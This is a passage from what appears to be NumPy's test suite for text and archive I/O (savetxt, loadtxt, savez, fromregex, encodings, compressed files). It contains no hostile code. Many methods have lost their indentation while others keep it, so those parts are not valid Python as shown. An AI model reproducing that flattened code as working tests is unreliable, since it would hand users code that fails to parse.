        # cause a second error will be raised when the attempt to remove
        # the open file is made.
        prefix = 'numpy_test_closing_zipfile_after_load_'
        with temppath(suffix='.npz', prefix=prefix) as tmp:
            np.savez(tmp, lab='place holder')
            data = np.load(tmp)
            fp = data.zip.fp
            data.close()
            assert_(fp.closed)
class TestSaveTxt(object):
def test_array(self):
    """savetxt writes a float array with an explicit fmt, then ints with %d."""
    fmt = "%.18e"
    buf = BytesIO()
    np.savetxt(buf, np.array([[1, 2], [3, 4]], float), fmt=fmt)
    buf.seek(0)
    expected = [asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
                asbytes((fmt + ' ' + fmt + '\n') % (3, 4))]
    assert_equal(buf.readlines(), expected)
    buf = BytesIO()
    np.savetxt(buf, np.array([[1, 2], [3, 4]], int), fmt='%d')
    buf.seek(0)
    assert_equal(buf.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_0D_3D(self):
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, np.array(1))
assert_raises(ValueError, np.savetxt, c, np.array([[[1], [2]]]))
def test_structured(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_structured_padded(self):
# gh-13297
a = np.array([(1, 2, 3),(4, 5, 6)], dtype=[
('foo', 'i4'), ('bar', 'i4'), ('baz', 'i4')
])
c = BytesIO()
np.savetxt(c, a[['foo', 'baz']], fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 3\n', b'4 6\n'])
@pytest.mark.skipif(Path is None, reason="No pathlib.Path")
def test_multifield_view(self):
    """np.save/np.load round-trip a padded multi-field view via a Path."""
    full = np.ones(1, dtype=[('x', 'i4'), ('y', 'i4'), ('z', 'f4')])
    view = full[['x', 'z']]
    with temppath(suffix='.npy') as tmp:
        tmp = Path(tmp)
        np.save(tmp, view)
        assert_array_equal(np.load(tmp), view)
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Specify delimiter, should be overridden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Bad fmt, should raise a ValueError
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, a, fmt=99)
def test_header_footer(self):
    """header/footer are emitted with the comments prefix (default '# ')."""
    data = np.array([(1, 2), (3, 4)], dtype=int)
    text = 'Test header / footer'
    # Header with the default comment prefix.
    buf = BytesIO()
    np.savetxt(buf, data, fmt='%1d', header=text)
    buf.seek(0)
    assert_equal(buf.read(), asbytes('# ' + text + '\n1 2\n3 4\n'))
    # Footer with the default comment prefix.
    buf = BytesIO()
    np.savetxt(buf, data, fmt='%1d', footer=text)
    buf.seek(0)
    assert_equal(buf.read(), asbytes('1 2\n3 4\n# ' + text + '\n'))
    # Custom comments string applied to the header.
    buf = BytesIO()
    commentstr = '% '
    np.savetxt(buf, data, fmt='%1d', header=text, comments=commentstr)
    buf.seek(0)
    assert_equal(buf.read(), asbytes(commentstr + text + '\n' + '1 2\n3 4\n'))
    # Custom comments string applied to the footer.
    buf = BytesIO()
    commentstr = '% '
    np.savetxt(buf, data, fmt='%1d', footer=text, comments=commentstr)
    buf.seek(0)
    assert_equal(buf.read(), asbytes('1 2\n3 4\n' + commentstr + text + '\n'))
def test_file_roundtrip(self):
with temppath() as name:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def test_complex_negative_exponent(self):
# Previous to 1.15, some formats generated x+-yj, gh 7895
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re - 1.0j * im
c = BytesIO()
np.savetxt(c, a, fmt='%.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' (3.142e+00-2.718e+00j) (3.142e+00-2.718e+00j)\n',
b' (3.142e+00-2.718e+00j) (3.142e+00-2.718e+00j)\n'])
def test_custom_writer(self):
class CustomWriter(list):
def write(self, text):
self.extend(text.split(b'\n'))
w = CustomWriter()
a = np.array([(1, 2), (3, 4)])
np.savetxt(w, a)
b = np.loadtxt(w)
assert_array_equal(a, b)
def test_unicode(self):
    # Non-ASCII text data must be writable once an explicit encoding
    # is supplied to savetxt.
    utf8 = b'\xcf\x96'.decode('UTF-8')
    a = np.array([utf8], dtype=np.unicode)
    with tempdir() as tmpdir:
        # set encoding as on windows it may not be unicode even on py3
        np.savetxt(os.path.join(tmpdir, 'test.csv'), a, fmt=['%s'],
                   encoding='UTF-8')
def test_unicode_roundtrip(self):
    # Round-trip unicode data through plain and compressed files using a
    # non-UTF-8 encoding (UTF-16-LE) to exercise the decoding path.
    utf8 = b'\xcf\x96'.decode('UTF-8')
    a = np.array([utf8], dtype=np.unicode)
    # our gz wrapper support encoding
    suffixes = ['', '.gz']
    # stdlib 2 versions do not support encoding
    if MAJVER > 2:
        if HAS_BZ2:
            suffixes.append('.bz2')
        if HAS_LZMA:
            suffixes.extend(['.xz', '.lzma'])
    with tempdir() as tmpdir:
        for suffix in suffixes:
            np.savetxt(os.path.join(tmpdir, 'test.csv' + suffix), a,
                       fmt=['%s'], encoding='UTF-16-LE')
            b = np.loadtxt(os.path.join(tmpdir, 'test.csv' + suffix),
                           encoding='UTF-16-LE', dtype=np.unicode)
            assert_array_equal(a, b)
def test_unicode_bytestream(self):
    # Writing unicode data to a byte stream encodes it with the given
    # encoding before writing.
    utf8 = b'\xcf\x96'.decode('UTF-8')
    a = np.array([utf8], dtype=np.unicode)
    s = BytesIO()
    np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
    s.seek(0)
    assert_equal(s.read().decode('UTF-8'), utf8 + '\n')
def test_unicode_stringstream(self):
    # Writing unicode data to a text stream passes the text through
    # unchanged (no byte encoding involved).
    utf8 = b'\xcf\x96'.decode('UTF-8')
    a = np.array([utf8], dtype=np.unicode)
    s = StringIO()
    np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
    s.seek(0)
    assert_equal(s.read(), utf8 + '\n')
@pytest.mark.parametrize("fmt", [u"%f", b"%f"])
@pytest.mark.parametrize("iotype", [StringIO, BytesIO])
def test_unicode_and_bytes_fmt(self, fmt, iotype):
    # string type of fmt should not matter, see also gh-4053:
    # savetxt must accept both str and bytes format strings and write
    # correctly to both text and byte streams.
    a = np.array([1.])
    s = iotype()
    np.savetxt(s, a, fmt=fmt)
    s.seek(0)
    if iotype is StringIO:
        assert_equal(s.read(), u"%f\n" % 1.)
    else:
        assert_equal(s.read(), b"%f\n" % 1.)
@pytest.mark.skipif(sys.platform=='win32',
                    reason="large files cause problems")
@pytest.mark.slow
def test_large_zip(self):
    # The test takes at least 6GB of memory, writes a file larger than 4GB
    try:
        # Probe up-front that enough memory is available; skip cleanly on
        # machines that cannot allocate it.
        a = 'a' * 6 * 1024 * 1024 * 1024
        del a
    except (MemoryError, OverflowError):
        pytest.skip("Cannot allocate enough memory for test")
    test_data = np.asarray([np.random.rand(np.random.randint(50,100),4)
                            for i in range(800000)])
    with tempdir() as tmpdir:
        # NOTE(review): presumably exercises the >4GB (zip64) branch of
        # np.savez — confirm against the npz writer.
        np.savez(os.path.join(tmpdir, 'test.npz'), test_data=test_data)
class LoadTxtBase(object):
    """Shared tests for text loaders.

    Subclasses set ``loadfunc`` (e.g. ``np.loadtxt`` or ``np.genfromtxt``)
    so the same encoding/converter tests run against each loader.
    """

    def check_compressed(self, fopen, suffixes):
        # Test that we can load data from a compressed file
        wanted = np.arange(6).reshape((2, 3))
        # All three historical line separators must be handled.
        linesep = ('\n', '\r\n', '\r')
        for sep in linesep:
            data = '0 1 2' + sep + '3 4 5'
            for suffix in suffixes:
                with temppath(suffix=suffix) as name:
                    with fopen(name, mode='wt', encoding='UTF-32-LE') as f:
                        f.write(data)
                    # Load by file name...
                    res = self.loadfunc(name, encoding='UTF-32-LE')
                    assert_array_equal(res, wanted)
                    # ...and from an already-open file object.
                    with fopen(name, "rt", encoding='UTF-32-LE') as f:
                        res = self.loadfunc(f)
                    assert_array_equal(res, wanted)

    # Python2 .open does not support encoding
    @pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
    def test_compressed_gzip(self):
        self.check_compressed(gzip.open, ('.gz',))

    @pytest.mark.skipif(not HAS_BZ2, reason="Needs bz2")
    @pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
    def test_compressed_bz2(self):
        self.check_compressed(bz2.open, ('.bz2',))

    @pytest.mark.skipif(not HAS_LZMA, reason="Needs lzma")
    @pytest.mark.skipif(MAJVER == 2, reason="Needs Python version >= 3")
    def test_compressed_lzma(self):
        self.check_compressed(lzma.open, ('.xz', '.lzma'))

    def test_encoding(self):
        # A non-default file encoding is honoured when reading by name.
        with temppath() as path:
            with open(path, "wb") as f:
                f.write('0.\n1.\n2.'.encode("UTF-16"))
            x = self.loadfunc(path, encoding="UTF-16")
            assert_array_equal(x, [0., 1., 2.])

    def test_stringload(self):
        # umlaute
        nonascii = b'\xc3\xb6\xc3\xbc\xc3\xb6'.decode("UTF-8")
        with temppath() as path:
            with open(path, "wb") as f:
                f.write(nonascii.encode("UTF-16"))
            x = self.loadfunc(path, encoding="UTF-16", dtype=np.unicode)
            assert_array_equal(x, nonascii)

    def test_binary_decode(self):
        # Byte streams are decoded with the given encoding before parsing.
        utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
        v = self.loadfunc(BytesIO(utf16), dtype=np.unicode, encoding='UTF-16')
        assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))

    def test_converters_decode(self):
        # test converters that decode strings
        c = TextIO()
        c.write(b'\xcf\x96')
        c.seek(0)
        x = self.loadfunc(c, dtype=np.unicode,
                          converters={0: lambda x: x.decode('UTF-8')})
        a = np.array([b'\xcf\x96'.decode('UTF-8')])
        assert_array_equal(x, a)

    def test_converters_nodecode(self):
        # test native string converters enabled by setting an encoding
        utf8 = b'\xcf\x96'.decode('UTF-8')
        with temppath() as path:
            with io.open(path, 'wt', encoding='UTF-8') as f:
                f.write(utf8)
            x = self.loadfunc(path, dtype=np.unicode,
                              converters={0: lambda x: x + 't'},
                              encoding='UTF-8')
            a = np.array([utf8 + 't'])
            assert_array_equal(x, a)
class TestLoadTxt(LoadTxtBase):
    """Tests specific to np.loadtxt (dtype handling, usecols, comments,
    skiprows/max_rows, ndmin, ...)."""

    loadfunc = staticmethod(np.loadtxt)

    def setup(self):
        # lower chunksize for testing
        self.orig_chunk = np.lib.npyio._loadtxt_chunksize
        np.lib.npyio._loadtxt_chunksize = 1

    def teardown(self):
        np.lib.npyio._loadtxt_chunksize = self.orig_chunk

    def test_record(self):
        c = TextIO()
        c.write('1 2\n3 4')
        c.seek(0)
        x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
        a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
        assert_array_equal(x, a)

        # Same check with a dict-style dtype descriptor.
        d = TextIO()
        d.write('M 64.0 75.0\nF 25.0 60.0')
        d.seek(0)
        mydescriptor = {'names': ('gender', 'age', 'weight'),
                        'formats': ('S1', 'i4', 'f4')}
        b = np.array([('M', 64.0, 75.0),
                      ('F', 25.0, 60.0)], dtype=mydescriptor)
        y = np.loadtxt(d, dtype=mydescriptor)
        assert_array_equal(y, b)

    def test_array(self):
        c = TextIO()
        c.write('1 2\n3 4')
        c.seek(0)
        x = np.loadtxt(c, dtype=int)
        a = np.array([[1, 2], [3, 4]], int)
        assert_array_equal(x, a)

        c.seek(0)
        x = np.loadtxt(c, dtype=float)
        a = np.array([[1, 2], [3, 4]], float)
        assert_array_equal(x, a)

    def test_1D(self):
        c = TextIO()
        c.write('1\n2\n3\n4\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int)
        a = np.array([1, 2, 3, 4], int)
        assert_array_equal(x, a)

        c = TextIO()
        c.write('1,2,3,4\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',')
        a = np.array([1, 2, 3, 4], int)
        assert_array_equal(x, a)

    def test_missing(self):
        c = TextIO()
        c.write('1,2,3,,5\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       converters={3: lambda s: int(s or - 999)})
        a = np.array([1, 2, 3, -999, 5], int)
        assert_array_equal(x, a)

    def test_converters_with_usecols(self):
        c = TextIO()
        c.write('1,2,3,,5\n6,7,8,9,10\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       converters={3: lambda s: int(s or - 999)},
                       usecols=(1, 3,))
        a = np.array([[2, -999], [7, 9]], int)
        assert_array_equal(x, a)

    def test_comments_unicode(self):
        c = TextIO()
        c.write('# comment\n1,2,3,5\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       comments=u'#')
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

    def test_comments_byte(self):
        c = TextIO()
        c.write('# comment\n1,2,3,5\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       comments=b'#')
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

    def test_comments_multiple(self):
        c = TextIO()
        c.write('# comment\n1,2,3\n@ comment2\n4,5,6 // comment3')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       comments=['#', '@', '//'])
        a = np.array([[1, 2, 3], [4, 5, 6]], int)
        assert_array_equal(x, a)

    def test_comments_multi_chars(self):
        c = TextIO()
        c.write('/* comment\n1,2,3,5\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       comments='/*')
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

        # Check that '/*' is not transformed to ['/', '*']
        c = TextIO()
        c.write('*/ comment\n1,2,3,5\n')
        c.seek(0)
        assert_raises(ValueError, np.loadtxt, c, dtype=int, delimiter=',',
                      comments='/*')

    def test_skiprows(self):
        c = TextIO()
        c.write('comment\n1,2,3,5\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       skiprows=1)
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

        c = TextIO()
        c.write('# comment\n1,2,3,5\n')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       skiprows=1)
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

    def test_usecols(self):
        a = np.array([[1, 2], [3, 4]], float)
        c = BytesIO()
        np.savetxt(c, a)
        c.seek(0)
        x = np.loadtxt(c, dtype=float, usecols=(1,))
        assert_array_equal(x, a[:, 1])

        a = np.array([[1, 2, 3], [3, 4, 5]], float)
        c = BytesIO()
        np.savetxt(c, a)
        c.seek(0)
        x = np.loadtxt(c, dtype=float, usecols=(1, 2))
        assert_array_equal(x, a[:, 1:])

        # Testing with arrays instead of tuples.
        c.seek(0)
        x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
        assert_array_equal(x, a[:, 1:])

        # Testing with an integer instead of a sequence
        for int_type in [int, np.int8, np.int16,
                         np.int32, np.int64, np.uint8, np.uint16,
                         np.uint32, np.uint64]:
            to_read = int_type(1)
            c.seek(0)
            x = np.loadtxt(c, dtype=float, usecols=to_read)
            assert_array_equal(x, a[:, 1])

        # Testing with some crazy custom integer type
        class CrazyInt(object):
            def __index__(self):
                return 1

        crazy_int = CrazyInt()
        c.seek(0)
        x = np.loadtxt(c, dtype=float, usecols=crazy_int)
        assert_array_equal(x, a[:, 1])

        c.seek(0)
        x = np.loadtxt(c, dtype=float, usecols=(crazy_int,))
        assert_array_equal(x, a[:, 1])

        # Checking with dtypes defined converters.
        data = '''JOE 70.1 25.3
                BOB 60.5 27.9
                '''
        c = TextIO(data)
        names = ['stid', 'temp']
        dtypes = ['S4', 'f8']
        arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
        assert_equal(arr['stid'], [b"JOE", b"BOB"])
        assert_equal(arr['temp'], [25.3, 27.9])

        # Testing non-ints in usecols
        c.seek(0)
        bogus_idx = 1.5
        assert_raises_regex(
            TypeError,
            '^usecols must be.*%s' % type(bogus_idx),
            np.loadtxt, c, usecols=bogus_idx
            )
        assert_raises_regex(
            TypeError,
            '^usecols must be.*%s' % type(bogus_idx),
            np.loadtxt, c, usecols=[0, bogus_idx, 0]
            )

    def test_fancy_dtype(self):
        c = TextIO()
        c.write('1,2,3.0\n4,5,6.0\n')
        c.seek(0)
        dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
        x = np.loadtxt(c, dtype=dt, delimiter=',')
        a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
        assert_array_equal(x, a)

    def test_shaped_dtype(self):
        c = TextIO("aaaa  1.0  8.0  1 2 3 4 5 6")
        dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
                       ('block', int, (2, 3))])
        x = np.loadtxt(c, dtype=dt)
        a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
                     dtype=dt)
        assert_array_equal(x, a)

    def test_3d_shaped_dtype(self):
        c = TextIO("aaaa  1.0  8.0  1 2 3 4 5 6 7 8 9 10 11 12")
        dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
                       ('block', int, (2, 2, 3))])
        x = np.loadtxt(c, dtype=dt)
        a = np.array([('aaaa', 1.0, 8.0,
                       [[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])],
                     dtype=dt)
        assert_array_equal(x, a)

    def test_str_dtype(self):
        # see gh-8033
        c = ["str1", "str2"]

        for dt in (str, np.bytes_):
            a = np.array(["str1", "str2"], dtype=dt)
            x = np.loadtxt(c, dtype=dt)
            assert_array_equal(x, a)

    def test_empty_file(self):
        with suppress_warnings() as sup:
            sup.filter(message="loadtxt: Empty input file:")
            c = TextIO()
            x = np.loadtxt(c)
            assert_equal(x.shape, (0,))
            x = np.loadtxt(c, dtype=np.int64)
            assert_equal(x.shape, (0,))
            assert_(x.dtype == np.int64)

    def test_unused_converter(self):
        c = TextIO()
        c.writelines(['1 21\n', '3 42\n'])
        c.seek(0)
        data = np.loadtxt(c, usecols=(1,),
                          converters={0: lambda s: int(s, 16)})
        assert_array_equal(data, [21, 42])

        c.seek(0)
        data = np.loadtxt(c, usecols=(1,),
                          converters={1: lambda s: int(s, 16)})
        assert_array_equal(data, [33, 66])

    def test_dtype_with_object(self):
        # Test using an explicit dtype with an object
        data = """ 1; 2001-01-01
                   2; 2002-01-31 """
        ndtype = [('idx', int), ('code', object)]
        func = lambda s: strptime(s.strip(), "%Y-%m-%d")
        converters = {1: func}
        test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
                          converters=converters)
        control = np.array(
            [(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
            dtype=ndtype)
        assert_equal(test, control)

    def test_uint64_type(self):
        tgt = (9223372043271415339, 9223372043271415853)
        c = TextIO()
        c.write("%s %s" % tgt)
        c.seek(0)
        res = np.loadtxt(c, dtype=np.uint64)
        assert_equal(res, tgt)

    def test_int64_type(self):
        tgt = (-9223372036854775807, 9223372036854775807)
        c = TextIO()
        c.write("%s %s" % tgt)
        c.seek(0)
        res = np.loadtxt(c, dtype=np.int64)
        assert_equal(res, tgt)

    def test_from_float_hex(self):
        # IEEE doubles and floats only, otherwise the float32
        # conversion may fail.
        tgt = np.logspace(-10, 10, 5).astype(np.float32)
        tgt = np.hstack((tgt, -tgt)).astype(float)
        inp = '\n'.join(map(float.hex, tgt))
        c = TextIO()
        c.write(inp)
        for dt in [float, np.float32]:
            c.seek(0)
            res = np.loadtxt(c, dtype=dt)
            assert_equal(res, tgt, err_msg="%s" % dt)

    def test_from_complex(self):
        tgt = (complex(1, 1), complex(1, -1))
        c = TextIO()
        c.write("%s %s" % tgt)
        c.seek(0)
        res = np.loadtxt(c, dtype=complex)
        assert_equal(res, tgt)

    def test_complex_misformatted(self):
        # test for backward compatibility
        # some complex formats used to generate x+-yj
        a = np.zeros((2, 2), dtype=np.complex128)
        re = np.pi
        im = np.e
        a[:] = re - 1.0j * im
        c = BytesIO()
        np.savetxt(c, a, fmt='%.16e')
        c.seek(0)
        txt = c.read()
        c.seek(0)
        # misformat the sign on the imaginary part, gh 7895
        txt_bad = txt.replace(b'e+00-', b'e00+-')
        assert_(txt_bad != txt)
        c.write(txt_bad)
        c.seek(0)
        res = np.loadtxt(c, dtype=complex)
        assert_equal(res, a)

    def test_universal_newline(self):
        with temppath() as name:
            with open(name, 'w') as f:
                f.write('1 21\r3 42\r')
            data = np.loadtxt(name)
        assert_array_equal(data, [[1, 21], [3, 42]])

    def test_empty_field_after_tab(self):
        c = TextIO()
        c.write('1 \t2 \t3\tstart \n4\t5\t6\t  \n7\t8\t9.5\t')
        c.seek(0)
        dt = {'names': ('x', 'y', 'z', 'comment'),
              'formats': ('<i4', '<i4', '<f4', '|S8')}
        x = np.loadtxt(c, dtype=dt, delimiter='\t')
        a = np.array([b'start ', b'  ', b''])
        assert_array_equal(x['comment'], a)

    def test_structure_unpack(self):
        txt = TextIO("M 21 72\nF 35 58")
        dt = {'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
        a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
        assert_(a.dtype.str == '|S1')
        assert_(b.dtype.str == '<i4')
        assert_(c.dtype.str == '<f4')
        assert_array_equal(a, np.array([b'M', b'F']))
        assert_array_equal(b, np.array([21, 35]))
        assert_array_equal(c, np.array([72.,  58.]))

    def test_ndmin_keyword(self):
        c = TextIO()
        c.write('1,2,3\n4,5,6')
        c.seek(0)
        assert_raises(ValueError, np.loadtxt, c, ndmin=3)
        c.seek(0)
        assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
        a = np.array([[1, 2, 3], [4, 5, 6]])
        assert_array_equal(x, a)

        d = TextIO()
        d.write('0,1,2')
        d.seek(0)
        x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
        assert_(x.shape == (1, 3))
        d.seek(0)
        x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
        assert_(x.shape == (3,))
        d.seek(0)
        x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
        assert_(x.shape == (3,))

        e = TextIO()
        e.write('0\n1\n2')
        e.seek(0)
        x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
        assert_(x.shape == (3, 1))
        e.seek(0)
        x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
        assert_(x.shape == (3,))
        e.seek(0)
        x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
        assert_(x.shape == (3,))

        # Test ndmin kw with empty file.
        with suppress_warnings() as sup:
            sup.filter(message="loadtxt: Empty input file:")
            f = TextIO()
            assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
            assert_(np.loadtxt(f, ndmin=1).shape == (0,))

    def test_generator_source(self):
        def count():
            for i in range(10):
                yield "%d" % i

        res = np.loadtxt(count())
        assert_array_equal(res, np.arange(10))

    def test_bad_line(self):
        c = TextIO()
        c.write('1 2 3\n4 5 6\n2 3')
        c.seek(0)

        # Check for exception and that exception contains line number
        assert_raises_regex(ValueError, "3", np.loadtxt, c)

    def test_none_as_string(self):
        # gh-5155, None should work as string when format demands it
        c = TextIO()
        c.write('100,foo,200\n300,None,400')
        c.seek(0)
        dt = np.dtype([('x', int), ('a', 'S10'), ('y', int)])
        np.loadtxt(c, delimiter=',', dtype=dt, comments=None)  # Should succeed

    @pytest.mark.skipif(locale.getpreferredencoding() == 'ANSI_X3.4-1968',
                        reason="Wrong preferred encoding")
    def test_binary_load(self):
        butf8 = b"5,6,7,\xc3\x95scarscar\n\r15,2,3,hello\n\r"\
                b"20,2,3,\xc3\x95scar\n\r"
        sutf8 = butf8.decode("UTF-8").replace("\r", "").splitlines()
        with temppath() as path:
            with open(path, "wb") as f:
                f.write(butf8)
            with open(path, "rb") as f:
                x = np.loadtxt(f, encoding="UTF-8", dtype=np.unicode)
            assert_array_equal(x, sutf8)
            # test broken latin1 conversion people now rely on
            with open(path, "rb") as f:
                x = np.loadtxt(f, encoding="UTF-8", dtype="S")
            # Bug fix: the old code rebound ``x`` to the expected list and
            # then compared that list with itself, so the loaded result was
            # never actually checked.  Derive the expected bytes via the
            # latin1 round-trip the loader applies for byte dtypes.
            expected = [s.encode('latin1') for s in sutf8]
            assert_array_equal(x, np.array(expected, dtype="S"))

    def test_max_rows(self):
        c = TextIO()
        c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       max_rows=1)
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

    def test_max_rows_with_skiprows(self):
        c = TextIO()
        c.write('comments\n1,2,3,5\n4,5,7,8\n2,1,4,5')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       skiprows=1, max_rows=1)
        a = np.array([1, 2, 3, 5], int)
        assert_array_equal(x, a)

        c = TextIO()
        c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       skiprows=1, max_rows=2)
        a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
        assert_array_equal(x, a)

    def test_max_rows_with_read_continuation(self):
        c = TextIO()
        c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       max_rows=2)
        a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
        assert_array_equal(x, a)
        # test continuation
        x = np.loadtxt(c, dtype=int, delimiter=',')
        a = np.array([2,1,4,5], int)
        assert_array_equal(x, a)

    def test_max_rows_larger(self):
        #test max_rows > num rows
        c = TextIO()
        c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
        c.seek(0)
        x = np.loadtxt(c, dtype=int, delimiter=',',
                       skiprows=1, max_rows=6)
        a = np.array([[1, 2, 3, 5], [4, 5, 7, 8], [2, 1, 4, 5]], int)
        assert_array_equal(x, a)
class Testfromregex(object):
def test_record(self):
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
def test_record_unicode(self):
utf8 = b'\xcf\x96'
with temppath() as path:
with open(path, 'wb') as f:
f.write(b'1.312 foo' + utf8 + b' \n1.534 bar\n4.444 qux')
dt = [('num', np.float64), ('val', 'U4')]
x = np.fromregex(path, r"(?u)([0-9.]+)\s+(\w+)", dt, encoding='UTF-8')
a = np.array([(1.312, 'foo' + utf8.decode('UTF-8')), (1.534, 'bar'),
(4.444, 'qux')], dtype=dt)
assert_array_equal(x, a)
regexp = re.compile(r"([0-9.]+)\s+(\w+)", re.UNICODE)
